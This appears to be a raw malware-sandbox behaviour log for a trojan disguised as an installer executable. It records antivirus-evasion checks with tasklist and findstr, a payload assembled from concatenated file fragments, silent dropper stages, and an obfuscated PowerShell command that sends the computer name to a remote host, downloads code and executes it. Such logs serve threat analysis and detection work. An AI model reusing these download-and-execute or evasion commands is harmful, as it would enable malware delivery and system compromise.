Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\EclipseSq	Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Code function: 23_2_033D1EE0	23_2_033D1EE0
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Code function: 23_2_033D16B0	23_2_033D16B0
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Code function: 23_2_033D1140	23_2_033D1140

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: String function: 004062A3 appears 58 times

Source: installer_1.05_36.5.exe

Static PE information: invalid certificate

Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr	Static PE information: Number of sections : 11 > 10
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	Static PE information: Number of sections : 11 > 10
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe.12.dr	Static PE information: Number of sections : 11 > 10

Source: installer_1.05_36.5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@83/36@5/3

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

0_2_004044A5

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Void

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

File created: C:\Users\user\AppData\Local\Temp\nsh3119.tmp

Jump to behavior

Source: installer_1.05_36.5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: installer_1.05_36.5.exe

Virustotal: Detection: 11%

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

File read: C:\Users\user\Desktop\installer_1.05_36.5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\installer_1.05_36.5.exe "C:\Users\user\Desktop\installer_1.05_36.5.exe"
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 373155
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E French
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rangers" Tender
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 373155\Pens.com + Limited + Guardian + Stationery + Checklist + Draft + Acids + Norway + Cord + Within + N + Nv 373155\Pens.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Comparing + ..\Void + ..\Hobby + ..\Death + ..\You + ..\Happen + ..\Fusion a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com Pens.com a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp "C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$60456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process created: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp "C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$70456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 373155	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E French	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rangers" Tender	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 373155\Pens.com + Limited + Guardian + Stationery + Checklist + Draft + Acids + Norway + Cord + Within + N + Nv 373155\Pens.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Comparing + ..\Void + ..\Hobby + ..\Death + ..\You + ..\Happen + ..\Fusion a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com Pens.com a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp "C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$60456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe "C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Process created: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp "C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp" /SL5="$70456,7785838,845824,C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
